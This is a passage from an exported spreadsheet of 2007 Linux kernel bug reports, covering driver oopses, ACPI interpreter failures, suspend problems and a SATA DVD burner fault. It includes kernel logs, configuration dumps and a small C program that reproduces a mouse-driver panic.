    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Slackware 11.0 Hardware Environment: 00:00.0 Host bridge: Intel Corporation 82875P/E7210 Memory Controller Hub (rev 02) 00:01.0 PCI bridge: Intel Corporation 82875P Processor to AGP Controller (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev c2) 00:1f.0 ISA bridge: Intel Corporation 82801EB/ER (ICH5/ICH5R) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801EB (ICH5) SATA Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) 00:1f.5 Multimedia audio controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) AC'97 Audio Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV40 [GeForce 6800 GT] (rev a1) 02:01.0 Ethernet controller: Broadcom Corporation BCM4401 100Base-T (rev 01) 02:06.0 Multimedia video controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder (rev 05) 02:07.0 Multimedia audio controller: Creative Labs SB Audigy (rev 04) 02:07.1 Input device controller: Creative Labs SB Audigy Game Port (rev 04) 02:07.2 FireWire (IEEE 1394): Creative Labs SB Audigy FireWire Port (rev 04) 02:01.0 Ethernet controller: Broadcom Corporation BCM4401 100Base-T (rev 01) Subsystem: EPoX Computer Co., Ltd. Unknown device 9012 Flags: bus master, fast devsel, latency 32, IRQ 17 Memory at fc004000 (32-bit, non-prefetchable) [size=8K] Capabilities: [40] Power Management version 2 Its OnBoard Network Card on MotherBoard EPOX 4pca3 Problem Description: I just try setup Wake On Lan on my BCM4401 ... I have b44 compiled native in kernel ("NOT MODULE") and after "ethtool -s eth0 wol g" and "halt" system crash whit error Jan 21 12:51:55 vladko kernel: BUG: unable to handle kernel paging request at virtual address 00f89158 Jan 21 12:51:55 vladko kernel: printing eip: Jan 21 12:51:55 vladko kernel: c0334c52 Jan 21 12:51:55 vladko kernel: *pde = 00000000 Jan 21 12:51:55 vladko kernel: Oops: 0000 [#1] Jan 21 12:51:55 vladko kernel: PREEMPT SMP Jan 21 12:51:55 vladko kernel: Modules linked in: snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss w83627hf hwmon_vid i2c_isa intel_agp i2c_i801 agpgart snd_intel8x0 Jan 21 12:51:55 vladko kernel: CPU: 0 Jan 21 12:51:55 vladko kernel: EIP: 0060:[&lt;c0334c52&gt;] Tainted: P VLI Jan 21 12:51:55 vladko kernel: EFLAGS: 00010286 (2.6.19.2 #1) Jan 21 12:51:55 vladko kernel: EIP is at b44_setup_wol+0xa9/0x116 Jan 21 12:51:55 vladko kernel: eax: 00000480 ebx: c1a42401 ecx: 00000010 edx: 00f881c0 Jan 21 12:51:55 vladko kernel: esi: c1a42400 edi: 00001023 ebp: 00000000 esp: f705be50 Jan 21 12:51:55 vladko kernel: ds: 007b es: 007b ss: 0068 Jan 21 12:51:55 vladko kernel: Process dhcpcd (pid: 2286, ti=f705a000 task=c1b91030 task.ti=f705a000) Jan 21 12:51:55 vladko kernel: Stack: c1a42400 00000000 c0334704 c1a42000 c1a42000 c1a42000 c0334d51 c1a42400 Jan 21 12:51:55 vladko kernel: 00000000 c1a42000 c1a42000 c0416f2d c1a42000 00000009 c1a42000 00001002 Jan 21 12:51:55 vladko kernel: c041858c c1a42000 c1b91030 0000000c 00000000 00000001 ffffff9d f743ecc0 Jan 21 12:51:55 vladko kernel: Call Trace: Jan 21 12:51:55 vladko kernel: [&lt;c0334704&gt;] b44_init_hw+0x55/0x13b Jan 21 12:51:55 vladko kernel: [&lt;c0334d51&gt;] b44_close+0x92/0xa1 Jan 21 12:51:55 vladko kernel: [&lt;c0416f2d&gt;] dev_close+0x58/0x7b Jan 21 12:51:55 vladko kernel: [&lt;c041858c&gt;] dev_change_flags+0x50/0x10a Jan 21 12:51:55 vladko kernel: [&lt;c04517e3&gt;] devinet_ioctl+0x284/0x525 Jan 21 12:51:55 vladko kernel: [&lt;c045365b&gt;] inet_ioctl+0x8e/0xb2 Jan 21 12:51:55 vladko kernel: [&lt;c040dc5b&gt;] sock_ioctl+0x1b1/0x1d1 Jan 21 12:51:55 vladko kernel: [&lt;c016481f&gt;] do_ioctl+0x33/0x79 Jan 21 12:51:55 vladko kernel: [&lt;c0164b16&gt;] vfs_ioctl+0x19b/0x1a7 Jan 21 12:51:55 vladko kernel: [&lt;c0164b7d&gt;] sys_ioctl+0x5b/0x76 Jan 21 12:51:55 vladko kernel: [&lt;c0102ccb&gt;] syscall_call+0x7/0xb Jan 21 12:51:55 vladko kernel: ======================= Jan 21 12:51:55 vladko kernel: Code: 08 09 d0 8b 93 70 01 00 00 89 82 8c 00 00 00 8b 93 70 01 00 00 8b 02 0c c0 89 02 eb 08 89 1c 24 e8 48 fd ff ff 8b 93 70 01 00 00 &lt;8b&gt; 82 98 0f 00 00 0d 00 00 00 40 89 82 98 0f 00 00 8d 44 24 12 Jan 21 12:51:55 vladko kernel: EIP: [&lt;c0334c52&gt;] b44_setup_wol+0xa9/0x116 SS:ESP 0068:f705be50 First i seen this problem on kernel version 2.6.18.1 Steps to reproduce: compile b44 as not module boot :) ethtool -s eth0 wol g halt thanks folks bubulak</t>
  </si>
  <si>
    <t>A MTIOCTOP/MTWEOF within the early warning will cause the file number to be incorrect</t>
  </si>
  <si>
    <t>2007-01-22 12:59 UTC</t>
  </si>
  <si>
    <t>Carl Reisinger</t>
  </si>
  <si>
    <t>2007-08-11 21:17 UTC</t>
  </si>
  <si>
    <t>Write records to a SCSI tape until a write fails with a ENOSPC (you have reached early warning. Now perform a: struct mtget before, after; ioctl(fd, MTIOCGET, &amp;before); struct mtop mtop = { MTWEOF, 1 }; ioctl(fd, MTIOCTOP, &amp;mtop); ioctl(fd, MTIOCGET, &amp;after); Check the value of mt_fileno in the before and after structures. Notice the after is 2 greater then the before. The problem appears to be in the block of code starting at line 2817 in st.c. This block is entered because the drive did return a CHECK CONDITION with NO SENSE and the SENSE_EOM bit set. At lines 2824/5 the fileno is incremented. But it has already been increased by the number of filemarks requested by the MTIOCTOP. I believe that the residue count in the sense data should be subtracted from fileno, not a increment as is done.</t>
  </si>
  <si>
    <t>ACPICA evaluates expressions with Named objects differently than MS</t>
  </si>
  <si>
    <t>2007-01-23 11:26 UTC</t>
  </si>
  <si>
    <t>2008-06-13 20:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the demo code attached. INTERNAL BUG NUMBER: 263</t>
  </si>
  <si>
    <t>Pop result from bottom principle doesn't work</t>
  </si>
  <si>
    <t>2007-01-23 11:27 UTC</t>
  </si>
  <si>
    <t>2008-06-13 20:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the demo code attached. INTERNAL BUG NUMBER: 275</t>
  </si>
  <si>
    <t>AE_STACK_OVERFLOW exception on nested calls to methods</t>
  </si>
  <si>
    <t>2007-01-23 11:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the demo code attached. INTERNAL BUG NUMBER: 262 Result stack overflow is unexpectedly emitted on interpretation of the AML code containing a method call expression with deeply nested calls (see demo).</t>
  </si>
  <si>
    <t>Code of ACPICA which handles AML_NAME_OP as ObjDesc-&gt;Reference.Opcode is unused</t>
  </si>
  <si>
    <t>2008-06-13 20:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: The patch removes unused code. INTERNAL BUG NUMBER: 266</t>
  </si>
  <si>
    <t>tifm_7xxx module loading prevents subsequent suspend to rame (S3)</t>
  </si>
  <si>
    <t>2007-01-24 05:17 UTC</t>
  </si>
  <si>
    <t>2007-06-30 12:30 UTC</t>
  </si>
  <si>
    <t>Alex Dubov</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Unknown. Have only had SD working using Vanilla Kernel. Distribution: Gentoo Hardware Environment: IBM/Lenovo Thinkpad z61m (9540-HAG) Software Environment: Gentoo with Vanilla Kernel. Problem Description: Laptop will suspend &amp; resume normally, unless the tifm_7xxx and related modules have been loaded for SD card access. Once loaded, even if the modules are unloaded before suspend, the kernel will hangup after showing Stopping tasks: =============================| on the console. Sometimes it prints various messages about the USB bus (Dependent on whether USB modules loaded, devices on bus etc), and it prints a message about the SD card slot as well. Then nothing. A power cycle is them needed to Steps to reproduce: Boot linux. Load tifm_7xxx modules (Inlcuding tifm_core tifm_7xx1 mmc_core mmc_block tifm_sd). Then attempt to suspend. Unloading all the modules before suspend also results in same effect.</t>
  </si>
  <si>
    <t>cpufreq detects wrong frequency on VIA Esther CPU (C7-1500)</t>
  </si>
  <si>
    <t>2007-01-24 13:22 UTC</t>
  </si>
  <si>
    <t>2008-01-01 12:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none known Distribution: Ubuntu Edgy, but the kernel is built from the sources Hardware Environment: VIA EPIA EX mini-ITX system EX15000g Software Environment: Ubuntu Linux 6.10 "Edgy Eft" Problem Description: cpufreq detects the CPU to also have 65.54 GHz! Apart from that, the CPU switches between 800 and 1500 correctly. See this: # cpufreq-info cpufrequtils 002: cpufreq-info (C) Dominik Brodowski 2004-2006 Report errors and bugs to linux@brodo.de, please. analyzing CPU 0: driver: acpi-cpufreq CPUs which need to switch frequency at the same time: 0 hardware limits: 800 MHz - 65.54 GHz available frequency steps: 1.50 GHz, 800 MHz, 65.54 GHz available cpufreq governors: userspace, ondemand, performance current policy: frequency should be within 800 MHz and 1.50 GHz. The governor "ondemand" may decide which speed to use within this range. current CPU frequency is 1.50 GHz. Steps to reproduce: # cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq 65535000 # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 1500000 800000 65535000 ### But this looks good: # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 1500000 # cat /proc/cpuinfo processor : 0 vendor_id : CentaurHauls cpu family : 6 model : 10 model name : VIA Esther processor 1500MHz stepping : 9 cpu MHz : 800.000 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce apic sep mtrr pge cmov pat clflush acpi mmx fxsr sse sse2 pni est rng rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en bogomips : 1600.96 clflush size : 64 and from the kernel .config: # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=y CONFIG_CPU_FREQ_STAT_DETAILS=y CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE=y # CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set CONFIG_CPU_FREQ_GOV_PERFORMANCE=y # CONFIG_CPU_FREQ_GOV_POWERSAVE is not set CONFIG_CPU_FREQ_GOV_USERSPACE=m CONFIG_CPU_FREQ_GOV_ONDEMAND=m # CONFIG_CPU_FREQ_GOV_CONSERVATIVE is not set # # CPUFreq processor drivers # CONFIG_X86_ACPI_CPUFREQ=m # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set # CONFIG_X86_POWERNOW_K8 is not set # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_SMI is not set # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_CPUFREQ_NFORCE2 is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set many regards, claas</t>
  </si>
  <si>
    <t>VIA CX700M2 is not recognized by via-agp, yet</t>
  </si>
  <si>
    <t>2007-01-24 13:29 UTC</t>
  </si>
  <si>
    <t>2007-06-05 11:10 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: VIA EPIA EX15000G mini-itx system Software Environment: Ubuntu Linux, "Edgy Eft" Problem Description: The new VIA CX700M2 chipset is not supported by the kernel agp and drm, yet VIA released a "driver package" that contains some new files. The source is located here: http://www.viaarena.com/Driver/cle266cn400cn-cx700cn800xorg40072-kernel-src_20061226.tgz see in ./src/3D/DRM-AGP_FC5/ It looks as if they only added some PCI-IDs.</t>
  </si>
  <si>
    <t>sdhci or mmc suspend/resume problem</t>
  </si>
  <si>
    <t>2.6.19.2-grsec</t>
  </si>
  <si>
    <t>2007-01-25 12:41 UTC</t>
  </si>
  <si>
    <t>Felix Triebel</t>
  </si>
  <si>
    <t>2007-06-24 13:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu Edgy Hardware Environment: Dell Inspiron 630m Software Environment: ? Problem Description: it is no problem for me, really, because I don't use MMC cards, but I thought it might help. I did send a report to the address in the log, but they directed me to report it here... this appears in the logs when suspending the machine. Jan 24 22:14:21 localhost kernel: mmc0: Got command interrupt even though no command operation was in progress. Jan 24 22:14:21 localhost kernel: mmc0: Please report this to &lt;sdhci-devel@list.drzeus.cx&gt;. Jan 24 22:14:21 localhost kernel: sdhci: ============== REGISTER DUMP ============== Jan 24 22:14:21 localhost kernel: sdhci: Sys addr: 0xffffffff | Version: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Blk size: 0x0000ffff | Blk cnt: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Argument: 0xffffffff | Trn mode: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Present: 0xffffffff | Host ctl: 0x000000ff Jan 24 22:14:21 localhost kernel: sdhci: Power: 0x000000ff | Blk gap: 0x000000ff Jan 24 22:14:21 localhost kernel: sdhci: Wake-up: 0x000000ff | Clock: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Timeout: 0x000000ff | Int stat: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: Int enab: 0xffffffff | Sig enab: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: AC12 err: 0x0000ffff | Slot int: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Caps: 0xffffffff | Max curr: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: =========================================== Jan 24 22:14:21 localhost kernel: mmc0: Card is consuming too much power! Jan 24 22:14:21 localhost kernel: mmc0: Unexpected interrupt 0x00800000. Please report this to &lt;sdhci-devel@list.drzeus.cx&gt;. Jan 24 22:14:21 localhost kernel: sdhci: ============== REGISTER DUMP ============== Jan 24 22:14:21 localhost kernel: sdhci: Sys addr: 0xffffffff | Version: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Blk size: 0x0000ffff | Blk cnt: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Argument: 0xffffffff | Trn mode: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Present: 0xffffffff | Host ctl: 0x000000ff Jan 24 22:14:21 localhost kernel: sdhci: Power: 0x000000ff | Blk gap: 0x000000ff Jan 24 22:14:21 localhost kernel: sdhci: Wake-up: 0x000000ff | Clock: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Timeout: 0x000000ff | Int stat: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: Int enab: 0xffffffff | Sig enab: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: AC12 err: 0x0000ffff | Slot int: 0x0000ffff Jan 24 22:14:21 localhost kernel: sdhci: Caps: 0xffffffff | Max curr: 0xffffffff Jan 24 22:14:21 localhost kernel: sdhci: =========================================== Steps to reproduce: every time on suspend/resume</t>
  </si>
  <si>
    <t>S4 resume: ac/battery update stops - Acer Ferrari 3200</t>
  </si>
  <si>
    <t>2007-01-25 16:09 UTC</t>
  </si>
  <si>
    <t>2007-02-20 22:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment:Acer Ferrari 3200 Software Environment:* Problem Description:ACPI interrupts are enabled before switching to loaded image; sometime ac/battery update stops after resume from disk. Steps to reproduce:Suspend/Resume about 6 times.</t>
  </si>
  <si>
    <t>an oops inside kmem_get_pages</t>
  </si>
  <si>
    <t>2.6.20rc5/smp</t>
  </si>
  <si>
    <t>2007-01-26 11:43 UTC</t>
  </si>
  <si>
    <t>2007-02-04 01:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20rc5 with smp config and disabled `amd k8 cool'n'quiet' bios option. 2.6.20rc5 with non-smp config and enabled cool'n'quiet. 2.6.18.x works fine with all configuratioins, 2.6.19.x not tested so far. Hardware Environment: M/B: http://www.epox.nl/products/view.php?product_id=421 processor</t>
  </si>
  <si>
    <t>system hangs during continuous, concurrent open/read/close on /dev/psaux</t>
  </si>
  <si>
    <t>2007-01-26 12:42 UTC</t>
  </si>
  <si>
    <t>Tomasz Grabiec</t>
  </si>
  <si>
    <t>2008-02-06 10:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: don't know Distribution: gentoo Hardware Environment: AMD Sempron 2000GHz, 512 MB RAM, PS/2 mouse Software Environment: Linux kernel, standard configuration + ext3,reiserfs,sata support Problem Description: After running the program listed below, and moving the mouse, quite continuously, the kernel panics after about 5-20 seconds of this action: Oops: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060: [&lt;c02b6a51&gt;] Not tainted EFALGS: 00010046 (2.6.17.13 #2) EIP is at mousedev_notify_readers + 0x18a/0x1c8 eax 001000f8 ebx df4ede10 ecx 00020001 edx 00100100 esi 001000f8 edi 0 ebp dfc3b570 esp da6adc2c ds: 007b es 007b ss 0068 (...) Calltrace: mousedev_event (...) psmouse_process_byte (...) (..) &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt Sorry for the holes in above, don't have time to rewrite everything but the bug is reproductible. I know this happens also with following kernels: linux-2.6.16-suspend2-r8 linux-2.6.18-suspend2-r1 linux-2.6.18-gentoo-r6 Steps to reproduce: Run the following program (probably as root to have access to /dev/psaux) ----- START ------- #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;fcntl.h&gt; #define PCOUNT 10 /* * Extensively open and close mouse file, do some read, write * */ void proc_func( int id ) { unsigned char buf[ 16 ]; while (1) { int fd; int i; int c; fd = open( "/dev/psaux", O_RDONLY ); if (fd &lt; 0) { perror("open error"); return; } fcntl( fd, F_SETFL, O_NONBLOCK ); c = read( fd, buf, sizeof(buf) ); if (c &gt; 0) { printf("(%2d): ", id); for (i=0; i&lt;c; i++) printf("%X ", (int)buf[i]); printf("\n"); } close( fd ); } } int main( int argc, char ** argv ) { int i; int stat; for (i=0; i&lt;PCOUNT; i++) if (fork() == 0) { proc_func( i ); _exit( 0 ); } waitpid( -1, &amp;stat, 0 ); return 0; } ------ STOP -------- Move the mouse continuously and wait.</t>
  </si>
  <si>
    <t>vdso page is no longer mapped for a.out binaries in kernel 2.6.18</t>
  </si>
  <si>
    <t>2.6.18 and later</t>
  </si>
  <si>
    <t>2007-01-26 14:31 UTC</t>
  </si>
  <si>
    <t>2007-03-13 05:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17.14 Distribution: vanilla kernel Hardware Environment: x86-32 Software Environment: gentoo Problem Description: this is a 2.6.18 regression bug. In kernel 2.6.18 the vdso page is no longer mapped for a.out binaries. For instance a program using sleep will sigsegv on delivery of SIGALRM (to be precise: on return from signal handling). I tested this using a static a.out binary. This program does work in 2.6.17 . cat /proc/pid/smaps does show that vdso is not mapped in 2.6.18 for an a.out binary. I had a look at fs/binfmt_elf.c and found that the vdso pages is mapped using arch_setup_additional_pages from arch/i386/kernel/sysenter.c for elf. I did a test calling arch_setup_additional_pages from fs/binfmt_aout.c with positive result. As arch_setup_additional_pages is defined in arch/i368-asm/elf.h only, I see no clean way to provide a patch for fs/binfmt_aout.c. Steps to reproduce: Compile a simple program using sleep() to a.out binary and execute it. It will sigsegv on delivery of SIGALRM.</t>
  </si>
  <si>
    <t>JMicron 20360/20363 + Samsung SH-W163A DVDRW Cannot Record</t>
  </si>
  <si>
    <t>2007-01-27 09:15 UTC</t>
  </si>
  <si>
    <t>Andrew Lyon</t>
  </si>
  <si>
    <t>2007-04-26 15:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none, tried 2.6.18, 2.6.19.2, 2.6.20-rc6 Distribution: Gentoo 32 bit Hardware Environment: Gigabyte GA-965-DS3 JMicron 20360/20363 AHCI Controller (rev 02) (prog-if 01 [AHCI 1.0]) Samsung SH-W163A SATA DVDRW Software Environment: Cdrecord-ProDVD-Clone 2.01.01a10 Problem Description: unable to record cd or dvd using cdrecord or other tools Steps to reproduce:cdrecord -sao dev=/dev/sr0 ./test.iso Cdrecord-ProDVD-Clone 2.01.01a10 (i686-pc-linux-gnu) Copyright (C) 1995-2006 Jörg Schilling scsidev: '/dev/sr0' devname: '/dev/sr0' scsibus: -2 target: -2 lun: -2 Warning: Open by 'devname' is unintentional and not supported. Linux sg driver version: 3.5.27 Using libscg version 'schily-0.8'. Device type : Removable CD-ROM Version : 5 Response Format: 2 Capabilities : Vendor_info : 'TSSTcorp' Identifikation : 'CD/DVDW SH-W163A' Revision : 'TS01' Device seems to be: Generic mmc2 DVD-R/DVD-RW. Using generic SCSI-3/mmc-2 DVD-R/DVD-RW driver (mmc_dvd). Driver flags : DVD MMC-3 SWABAUDIO BURNFREE Supported modes: PACKET SAO cdrecord: CD/DVD-Recorder not ready. I get loads of these errors: ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete ata2.00: speed down requested but no transfer mode left ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x30 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO0 ata2: EH complete full bootup dmesg: Linux version 2.6.19-gentoo-r4 (root@beast) (gcc version 4.1.1 (Gentoo 4.1.1-r3)) #1 SMP Fri Jan 19 00:32:29 GMT 2007 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007fff0000 (usable) BIOS-e820: 000000007fff0000 - 000000007fff3000 (ACPI NVS) BIOS-e820: 000000007fff3000 - 0000000080000000 (ACPI data) BIOS-e820: 00000000f0000000 - 00000000f4000000 (reserved) BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) 1151MB HIGHMEM available. 896MB LOWMEM available. found SMP MP-table at 000f5340 Entering add_active_range(0, 0, 524272) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 229376 HighMem 229376 -&gt; 524272 early_node_map[1] active PFN ranges 0: 0 -&gt; 524272 On node 0 totalpages: 524272 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 1760 pages used for memmap Normal zone: 223520 pages, LIFO batch:31 HighMem zone: 2303 pages used for memmap HighMem zone: 292593 pages, LIFO batch:31 DMI 2.3 present. ACPI: RSDP (v000 GBT ) @ 0x000f6c80 ACPI: RSDT (v001 GBT AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x7fff3040 ACPI: FADT (v001 GBT AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x7fff30c0 ACPI: MCFG (v001 GBT AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x7fff7b80 ACPI: MADT (v001 GBT AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x7fff7a80 ACPI: SSDT (v001 PmRef Cpu0Ist 0x00003000 INTL 0x20040311) @ 0x7fff7c00 ACPI: SSDT (v001 PmRef CpuPm 0x00003000 INTL 0x20040311) @ 0x7fff8090 ACPI: DSDT (v001 GBT AWRDACPI 0x00001000 MSFT 0x0100000c) @ 0x00000000 ACPI: PM-Timer IO Port: 0x408 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 6:15 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 6:15 APIC version 20 ACPI: LAPIC (acpi_id[0x02] lapic_id[0x02] disabled) ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] disabled) ACPI: LAPIC_NMI (acpi_id[0x00] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x03] dfl dfl lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 88000000 (gap: 80000000:70000000) Detected 2400.140 MHz processor. Built 1 zonelists. Total pages: 520177 Kernel command line: mapped APIC to ffffd000 (fee00000) mapped IOAPIC to ffffc000 (fec00000) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 PID hash table entries: 4096 (order: 12, 16384 bytes) Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 2074404k/2097088k available (2483k kernel code, 21456k reserved, 930k data, 212k init, 1179584k highmem) virtual kernel memory layout: fixmap : 0xfff9d000 - 0xfffff000 ( 392 kB) pkmap : 0xff800000 - 0xffc00000 (4096 kB) vmalloc : 0xf8800000 - 0xff7fe000 ( 111 MB) lowmem : 0xc0000000 - 0xf8000000 ( 896 MB) .init : 0xc045c000 - 0xc0491000 ( 212 kB) .data : 0xc036ce07 - 0xc04558b4 ( 930 kB) .text : 0xc0100000 - 0xc036ce07 (2483 kB) Checking if this processor honours the WP bit even in supervisor mode... 